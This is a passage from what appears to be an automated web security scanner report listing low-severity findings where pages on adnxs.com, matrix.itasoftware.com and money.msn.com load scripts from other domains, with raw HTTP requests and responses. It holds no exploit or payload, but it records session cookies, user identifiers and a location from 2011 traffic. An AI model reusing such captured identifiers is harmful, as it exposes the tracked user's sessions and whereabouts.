Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 18:39:22 GMT
Content-Length: 2226

<IFRAME SRC="http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.2
...[SNIP]...
ZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie;sz=728x90;ord=98489;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.146&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAH3h70lkAHXywegAQGoAe3TB7ABAg&redirecturl2=;ord=98489?"></SCRIPT>
...[SNIP]...

20.30. http://m.adnxs.com/tt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.adnxs.com
Path:   /tt

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /tt?member=280&inv_code=REAB01&cb=1243611902 HTTP/1.1
Host: m.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7*joV9bN)jmf5I]snH/]xnzH[iw%qgjwh>p+^cZz<R-eMV?4^a>]$!X9^RDTuLuZpK9=dIc/-`$T$goi.=oVzyWz'.(.XYco!RC'>1Qx(W`nwzUj?YH[J$3nv-KK#-iL$QJfrZbdN+(Bo3KgX#`c5]qvg^lIg`K'/jYd`<2[cP$Mn.k).`o#?[DvFCmKS]_Rn]AnwyPLgc8R]HmkeLCt7wt+CdMJIY(Q8dnxZw!E9DDGh)[$QnR%ndJcRbu@?$Pk*eA85bgvgm.WQEeO/56q?$4$_+(]sS//QhH(L+o:.t`@]S2kvs7O@m7UZqq?WyPmfoNWxM!.CjYr2V.i

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 27-Apr-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIImdYCEAoYASABKAEw2qLc7QQQ2qLc7QQYAA..; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=P#svd:(%iIYUW[ka%F6P9BKUe`h-Uw1UV1'!F+itmDJX'0z[`+B!OOclfZN%p1anmQi))(EM:>@>i!7Erm#VQ=y1kR1I/m[-YAD8)MvNO9-KB/M=PhC^:-uCskzysaV/A-^X5ZP0(HqR/y7/szOz6v=Q5EdB:Y(4SBg?:l8]3^OkGzcVI6fs0V6g%Ql]pQKZ'6/+D1O4oOkrL)X*7P(isL#NKe0])kMCmmIm:?dyLUh0@6eKK-*L:%LQc0KPOtwh*#Idv_byR70)hqQJI1A6T+eKm'Df>K'^AQNoC*Ku/Wm=[=`Mr.yZKx/S3(V2`p`XB%9wW6L?].Um<[v:b/tt3[GdP[407fnPbggJ>91*wFE4Oc0>UW_*lP!ZzBgL<J>%P>Exi*J+>[YKqa]%L5w<LiPiP$Z+NL0rQ.D:(=M!)ZgZ<5<oyZpBFibX4C@LtjRT`mDsI1Vk!p#-[^4d`>F:?; path=/; expires=Mon, 25-Jul-2011 18:39:22 GMT; domain=.adnxs.com; HttpOnly
Date: Tue, 26 Apr 2011 18:39:22 GMT
Content-Length: 2278

<IFRAME SRC="http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.14;sz=728x90;ord=24736;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.2
...[SNIP]...
TR1NEszODdRdk1zRkRoG3UCFdE9gAGx2fn8AZAB18sHoAEBqAHt0wewAQI&redirecturl2=;ord=24736?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N2886.151350.QUANTCAST.COM/B5403001.14;abr=!ie;sz=728x90;ord=24736;click=http://exch.quantserve.com/r?a=p-03tSqaTFVs1ls&labels=_qc.clk,_click.adserver.rtb&rtbip=74.217.61.147&rtbdata2=EAUaDk1ldHJvUENTX1EyLTExILgLKKgXMM3bHjonaHR0cDovL21pY3Jvc29mdGFkdmVydGlzaW5nZXhjaGFuZ2UuY29tQgcIx9QHEPUBSgcImrUGEI1ZUAFaKG9lZldzNkhsanVLNDU5S3dyTFdhdDZHMGdyZTR1NEszODdRdk1zRkRoG3UCFdE9gAGx2fn8AZAB18sHoAEBqAHt0wewAQI&redirecturl2=;ord=24736?"></SCRIPT>
...[SNIP]...

20.31. http://matrix.itasoftware.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.9.10.1303847753

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:56:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Tue, 26 Apr 2011 19:56:43 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 6007


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...
</script>

<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...

20.32. http://matrix.itasoftware.com/view/details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://matrix.itasoftware.com
Path:   /view/details

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /view/details?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61 HTTP/1.1
Host: matrix.itasoftware.com
Proxy-Connection: keep-alive
Referer: http://matrix.itasoftware.com/view/flights?session=9dec83c4-0dea-4ecc-8e10-94096c69ac61
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=269716137.1303847753.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=241137183.1303847824.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269716137.2091474344.1303847753.1303847753.1303847753.1; __utmc=269716137; __utmb=269716137.13.10.1303847753; searchFormState=%7B%22version%22%3A%220.7.20110124.2%22%2C%22json%22%3A%22%7B%5C%22mode%5C%22%3A%7B%5C%22date%5C%22%3A%5C%22exact%5C%22%2C%5C%22flightSelection%5C%22%3A%5C%22trip%5C%22%2C%5C%22flightView%5C%22%3A%5C%22trip%5C%22%2C%5C%22pageFlow%5C%22%3A%5C%22exact%5C%22%2C%5C%22trip%5C%22%3A%5C%22rt%5C%22%2C%5C%22calendarRange%5C%22%3A%5C%2230day%5C%22%7D%2C%5C%22searchForm%5C%22%3A%7B%5C%22mode%5C%22%3A%5C%22advanced%5C%22%2C%5C%22defaults%5C%22%3A%7B%5C%22multiCityRows%5C%22%3A2%7D%2C%5C%22awards%5C%22%3A%5C%22noawards%5C%22%2C%5C%22options%5C%22%3A%7B%5C%22showRoutingCodes%5C%22%3Afalse%2C%5C%22showFlightTimes%5C%22%3A%5Bfalse%2Cfalse%5D%2C%5C%22pax%5C%22%3A%5C%22simple%5C%22%7D%7D%7D%22%7D; __utma=241137183.2018797994.1303847824.1303847824.1303847824.1; __utmc=241137183; __utmb=241137183.3.10.1303847824

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:00:25 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Content-Length: 5854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-eq
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

20.33. http://money.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; Sample=37; MUID=B506C07761D7465D924574124E3C14DF&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:39 GMT
ntCoent-Length: 76859
Content-Length: 76859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.34. http://money.msn.com/ResponseBridge.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /ResponseBridge.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ResponseBridge.aspx HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://social.msn.com/boards/RequestBridge.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:46:27 GMT
ntCoent-Length: 15512
Content-Length: 15512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.35. http://money.msn.com/investing/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /investing/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /investing/ HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:42 GMT
ntCoent-Length: 92243
Content-Length: 92243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.36. http://money.msn.com/market-news/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /market-news/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /market-news/default.aspx?feat=2f32cfe1-809c-4c94-91ed-3e58746880aa HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM05
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
ntCoent-Length: 81429
Content-Length: 81429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.37. http://money.msn.com/market-news/post.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /market-news/post.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /market-news/post.aspx?post=52202fc5-4a2e-46b1-903d-a418351bd8ea HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:53 GMT
ntCoent-Length: 78319
Content-Length: 78319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.38. http://money.msn.com/personal-finance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /personal-finance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /personal-finance/ HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:42 GMT
ntCoent-Length: 51596
Content-Length: 51596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.39. http://money.msn.com/tax-tips/post.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /tax-tips/post.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tax-tips/post.aspx?post=8fa91862-f906-481d-8eae-2c7e1758d57c HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/taxes/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:45:16 GMT
ntCoent-Length: 76880
Content-Length: 76880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://cpc.db3.s-msn.com/MSN/sc/js/38/8981e0642fa0b6ec71065801251bac.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

20.40. http://money.msn.com/taxes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.msn.com
Path:   /taxes/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /taxes/ HTTP/1.1
Host: money.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
